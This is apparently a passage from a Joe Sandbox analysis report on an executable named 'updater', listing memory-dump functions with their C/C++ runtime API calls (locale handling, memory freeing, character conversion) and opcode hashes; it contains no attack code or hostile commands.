                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                  • String ID:
                                  • API String ID: 1973839345-0
                                  • Opcode ID: 14e2783945d78e2baf7d3c18d04907f74c18fbc185aad552db1e3fa1daadfe43
                                  • Instruction ID: 708712f43d10e0852d87471412e5389d659aa3a6c018ef58b00f2b070cd0dcf7
                                  • Opcode Fuzzy Hash: 14e2783945d78e2baf7d3c18d04907f74c18fbc185aad552db1e3fa1daadfe43
                                  • Instruction Fuzzy Hash: E801C0399001168BCB06EB68C824AAEBB71BFA0728F18450FD809672F4CF359E02C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free_strpbrk
                                  • String ID: *?
                                  • API String ID: 3300345361-2564092906
                                  • Opcode ID: c2435c114784b797fa6856977d9cdf00b5fb06a9875519311553b62671703d1f
                                  • Instruction ID: b40fa9aa363c09781f2cecd6a9537e4f89fb9db740511d220c32055a29c821b6
                                  • Opcode Fuzzy Hash: c2435c114784b797fa6856977d9cdf00b5fb06a9875519311553b62671703d1f
                                  • Instruction Fuzzy Hash: 36615CB1E002199FDF15DFA9C8809EEFBF5EF9C310B14816AE855E7310E635AE418B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 013C1730
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013C176D
                                    • Part of subcall function 0140A8A9: _Yarn.LIBCPMT ref: 0140A8C8
                                    • Part of subcall function 0140A8A9: _Yarn.LIBCPMT ref: 0140A8EC
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 013C17AE
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 013C181F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Locinfo::_LockitYarn$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                  • String ID: bad locale name
                                  • API String ID: 2090653598-1405518554
                                  • Opcode ID: c1e1f51bb71ef6c44330e2670a6646e768445effcb7c6b75f76d62750453b17c
                                  • Instruction ID: 7062aab207de762138289d700b2d4510dbb44afc0157adebb2671eecb9339906
                                  • Opcode Fuzzy Hash: c1e1f51bb71ef6c44330e2670a6646e768445effcb7c6b75f76d62750453b17c
                                  • Instruction Fuzzy Hash: 58319E72804B10DFD7369F1BE840656FBF0FF68A10B608A2FE09E86A60C734A541DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,014227B7,?,?,0142277F,?,?,?), ref: 014227D7
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,014227B7,?,?,0142277F,?,?,?), ref: 014227EA
                                  • FreeLibrary.KERNEL32(00000000,?,?,014227B7,?,?,0142277F,?,?,?), ref: 0142280D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 772191587174cca5aef57992a1d0556550c7fcb98b63a3e8f5ce5bed67535526
                                  • Instruction ID: d89c04c665d451b206d952a9dc39258779252ccf0ffee7f0f349878cb8829893
                                  • Opcode Fuzzy Hash: 772191587174cca5aef57992a1d0556550c7fcb98b63a3e8f5ce5bed67535526
                                  • Instruction Fuzzy Hash: 4FF08C34501229FBEB219BA5ED09F9E7E78EB00756F240165F900A22B0CBB0CB41DB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0143E562,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0143E349
                                  • __alloca_probe_16.LIBCMT ref: 0143E3FF
                                  • __alloca_probe_16.LIBCMT ref: 0143E495
                                  • __freea.LIBCMT ref: 0143E500
                                  • __freea.LIBCMT ref: 0143E50C
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __alloca_probe_16__freea$Info
                                  • String ID:
                                  • API String ID: 2330168043-0
                                  • Opcode ID: 9f6e274c1428ecc04d9f4d7c948a7911ae5ec78935e2629e71932a6e9bcee369
                                  • Instruction ID: 990cd9088d1f8affc8b7820a14fb65868d2720dea6f1c8c8e445b8a1c1c0cd20
                                  • Opcode Fuzzy Hash: 9f6e274c1428ecc04d9f4d7c948a7911ae5ec78935e2629e71932a6e9bcee369
                                  • Instruction Fuzzy Hash: 8981B9719022169BEF219EA9C840EEF7FB59FAD214F18006BEA15B73B1E631D941C760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0143255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0143838D,00000220,?,?,?,?,?,?,01423E8D,?), ref: 0143258E
                                  • _free.LIBCMT ref: 0142EAC5
                                  • _free.LIBCMT ref: 0142EADC
                                  • _free.LIBCMT ref: 0142EAF9
                                  • _free.LIBCMT ref: 0142EB14
                                  • _free.LIBCMT ref: 0142EB2B
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$AllocateHeap
                                  • String ID:
                                  • API String ID: 3033488037-0
                                  • Opcode ID: 01dd7c867de21f706a46153fd0fc1cc341027d6af54d6cac2fb82a3f071f2990
                                  • Instruction ID: 306aedb729f29a43259331dd8ebbf96f8dfeaf82ac919fcbf125f429a14d136e
                                  • Opcode Fuzzy Hash: 01dd7c867de21f706a46153fd0fc1cc341027d6af54d6cac2fb82a3f071f2990
                                  • Instruction Fuzzy Hash: 0851C431A00215AFDB21DF6EC841A6ABBF4FF58720F54056EE50AE7260E771EA418B50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0141CD10
                                  • __alloca_probe_16.LIBCMT ref: 0141CD3C
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0141CD7B
                                  • __alloca_probe_16.LIBCMT ref: 0141CDEF
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0141CE50
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$__alloca_probe_16
                                  • String ID:
                                  • API String ID: 2135360126-0
                                  • Opcode ID: 695400f3bd69898861a911df6f23e11b20a362fba9fe2f8112fdea2be4cf383b
                                  • Instruction ID: 598e1504790ce800fb5aabd1d9dafc3089eac73bab60bc845622a2c0403731b1
                                  • Opcode Fuzzy Hash: 695400f3bd69898861a911df6f23e11b20a362fba9fe2f8112fdea2be4cf383b
                                  • Instruction Fuzzy Hash: 3A51E472940316ABEF205F59CC84FAF7FA9EF50A64F15442AEE05A7278E730D911CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Lock$SleepUnlock
                                  • String ID:
                                  • API String ID: 1216273398-0
                                  • Opcode ID: 9a64094a112b91956652820a12d1d3c81b438a4094011135bd1128301d3d2cf6
                                  • Instruction ID: 68df7ed4c8dfbe7d1fb2c8cea3e3e7e3c526a492729e656ee26cdfa8c3ee44b7
                                  • Opcode Fuzzy Hash: 9a64094a112b91956652820a12d1d3c81b438a4094011135bd1128301d3d2cf6
                                  • Instruction Fuzzy Hash: B931D479741735BBEB334A199C89BAA7AD0BB40B69F118125FE057B2C0D771D941CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Maklocstr$Maklocchr
                                  • String ID:
                                  • API String ID: 2020259771-0
                                  • Opcode ID: 1f0486dd892c06c4c839acb02575663edfa94253e3df721252aaf3ab45083ef9
                                  • Instruction ID: 2569046b57297f135739bbdbfe91d1f3cd8d494847b26f46e007c65da662c0d3
                                  • Opcode Fuzzy Hash: 1f0486dd892c06c4c839acb02575663edfa94253e3df721252aaf3ab45083ef9
                                  • Instruction Fuzzy Hash: C3118FB69007457FE3219BA68880F13B7ECEF15610F04492AF2458BAA0D375FD5087A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C1D9
                                  • int.LIBCPMT ref: 0140C1F0
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140C22A
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C24A
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C257
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 952d4d44809c24a6668fe09e295ccfcee8df336c7cac2035325f6a5151da1902
                                  • Instruction ID: 3cbb0d809f9bbc609e2c4ce2e252f652e4414db4287166004357ecda726acf58
                                  • Opcode Fuzzy Hash: 952d4d44809c24a6668fe09e295ccfcee8df336c7cac2035325f6a5151da1902
                                  • Instruction Fuzzy Hash: 7C01C475D0011ACBCB06EBA98854ABE7764BFA4B24F18425ED815673F0CF749A05C781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C398
                                  • int.LIBCPMT ref: 0140C3AF
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140C3E9
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C409
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C416
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 14e4bf97042d2f7b2e8eff3bef4e433c1e1173411ae098dfd08f005997fb5568
                                  • Instruction ID: 69856e06b9f3a65ff0b9079bdee3474ea8e5be2925f8dcfe0cb260d9f36d7855
                                  • Opcode Fuzzy Hash: 14e4bf97042d2f7b2e8eff3bef4e433c1e1173411ae098dfd08f005997fb5568
                                  • Instruction Fuzzy Hash: BE01C475D00116DBCB16EB698844AFEB761BFA0614F29416EE8126B2F0CF749A06D781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C26E
                                  • int.LIBCPMT ref: 0140C285
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140C2BF
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C2DF
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C2EC
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: b4ab73f05b6cc748c9e99fed6d12ab73ea4f680816f669d4ac5aaf02d3c996e5
                                  • Instruction ID: 39606d0cb0a8c58e040f8e5867b60699ef83e949b2411596f6092cc59529b6a0
                                  • Opcode Fuzzy Hash: b4ab73f05b6cc748c9e99fed6d12ab73ea4f680816f669d4ac5aaf02d3c996e5
                                  • Instruction Fuzzy Hash: 5601C036D00116DBDB06EBAA8844ABEBB65BFA0624F18415ED8056B6F0CF349E05DB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C303
                                  • int.LIBCPMT ref: 0140C31A
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140C354
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C374
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C381
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: a646c2077a95016f068c12a3d80e7f384bf5f8336d2655a1080ee661b4bdb482
                                  • Instruction ID: bb0a4baff6381b4a33ca0c799859331d48ee3690770fd218f2f3c7c47d68dc4d
                                  • Opcode Fuzzy Hash: a646c2077a95016f068c12a3d80e7f384bf5f8336d2655a1080ee661b4bdb482
                                  • Instruction Fuzzy Hash: EE01C475900116DBCB16EB6A8854ABEB7B4BFA4714F18425ED805673F0CF349A06C781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C716
                                  • int.LIBCPMT ref: 0140C72D
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140C767
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C787
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C794
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 137f08950a4a96676d119e643778c6218265c1b440027ca7ba3da15d23c318aa
                                  • Instruction ID: 6ad0609af34f6ecc583557963e03de8bcd116a446d0edce6fb55ad16e0134d75
                                  • Opcode Fuzzy Hash: 137f08950a4a96676d119e643778c6218265c1b440027ca7ba3da15d23c318aa
                                  • Instruction Fuzzy Hash: 20010035900117DBCB06EB6A8850AAEBB64BFA0624F28415FD900672F0CF749A05C781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C7AB
                                  • int.LIBCPMT ref: 0140C7C2
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140C7FC
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C81C
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C829
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 0697ee1447ff4fb5b84a4a20f416fe25c09326f66fe23c6c569af89a0b6cb857
                                  • Instruction ID: 3e52557d25cfdfaae9e242133fa6d67be18789f73f172ecdd723bd056da988c7
                                  • Opcode Fuzzy Hash: 0697ee1447ff4fb5b84a4a20f416fe25c09326f66fe23c6c569af89a0b6cb857
                                  • Instruction Fuzzy Hash: 1101047A900116CBCB06EB69C854ABEB774BFA4728F18455ED8156B2F1CF348E01C781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C681
                                  • int.LIBCPMT ref: 0140C698
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140C6D2
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C6F2
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C6FF
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 612c562c74ab552d9220729aca904ca058bbe5c399d6bf55e6ad16842c96771d
                                  • Instruction ID: 75c5f2b46f505a58b4662c3b8e8e56c3583cef7f71ea9f658b60c10df81df0e7
                                  • Opcode Fuzzy Hash: 612c562c74ab552d9220729aca904ca058bbe5c399d6bf55e6ad16842c96771d
                                  • Instruction Fuzzy Hash: 3501A175900116DBDB16EB69C844AAEBB71BF60614F18455FD805AB2E0CF349E05CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C9FF
                                  • int.LIBCPMT ref: 0140CA16
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140CA50
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140CA70
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140CA7D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 22df7d2154c1d0c10110f39110d8b9e15573a02b4d3277959015f249ab285c56
                                  • Instruction ID: 0d2c4aa6d33b52adc6b8936d8e42c0088a9aa3709b5eb544472c3763e555e9fd
                                  • Opcode Fuzzy Hash: 22df7d2154c1d0c10110f39110d8b9e15573a02b4d3277959015f249ab285c56
                                  • Instruction Fuzzy Hash: E701C075D00116CBDB06EB69C854BBEBB60BFA0B24F29465EE811672F0CF749A41CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C840
                                  • int.LIBCPMT ref: 0140C857
